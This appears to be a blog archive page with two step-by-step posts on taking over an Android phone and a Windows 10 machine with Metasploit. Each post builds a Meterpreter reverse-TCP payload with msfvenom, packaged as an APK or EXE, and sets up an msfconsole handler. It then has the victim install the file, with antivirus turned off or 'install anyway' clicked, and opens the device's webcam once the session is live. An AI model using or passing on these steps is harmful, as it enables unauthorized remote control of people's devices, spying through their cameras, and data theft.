Posts

Showing posts from September, 2021

Exploiting Android using "msfvenom'' and "msfconsole''

Image
STEP 1 :- Go to the Kali Linux terminal and type the following command as shown below :-  msfvenom -p android/meterpreter/reverse_tcp lhost=your IP of Kali lport=8080 > exploit name.apk STEP 2 :- Now the apk file is created so move it to your Android phone . STEP 3 :- Now type the following commands as follows :-  msfconsole  use multi/handler set payload android/meterpreter/reverse_tcp set lhost your IP of Kali set lport 8080 exploit  STEP 4 :- Now go the apk file location and click on the apk file from android and install it . Give all permissions to app and install it .(NOTE :- CLICK ON INSTALL ANYWAY). STEP 5 :- After installing it click on the app and you will see that session is created in Kali Linux terminal . STEP 6 :- Now you have all the control or you android device . STEP 7 :- I have shown you an example by opening webcam in android device . STEP 8 :- You can use different commands to operate the android device .Just type help in your Kali Linux terminal and you will get

Exploiting Windows 10 using "msfvenom''and "msfconsole''

Image
 STEP 1 :- Go to the Kali Linux terminal and type the following command as shown below:- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=your IP of Kali lport=8080 -f exe > exploit name.exe STEP 2 :- Now the exe file is created so move it to your target machine (NOTE:- TURN OFF THE ANTIVIRUS TO EXECUTE THE FILE). STEP 3 :- Now type the following commands as follows:- msfconsole use exploit/multi/handler set payload w indows/x64/meterpreter/reverse_tcp set lhost your IP of Kali  set lport 8080 exploit  STEP 4 :- Now click on the exe file from your Target machine . STEP 5 :- Now you can able to see that session is created in Kali Linux . STEP 6 :- Now you have all control to your target machine which is windows machine in our case . STEP 7 :- I have shown you example by opening webcam of target machine . STEP 8 :- You can also use different commands to operate the target machine . To know the different commands type help and you will get all commands listed . That's it from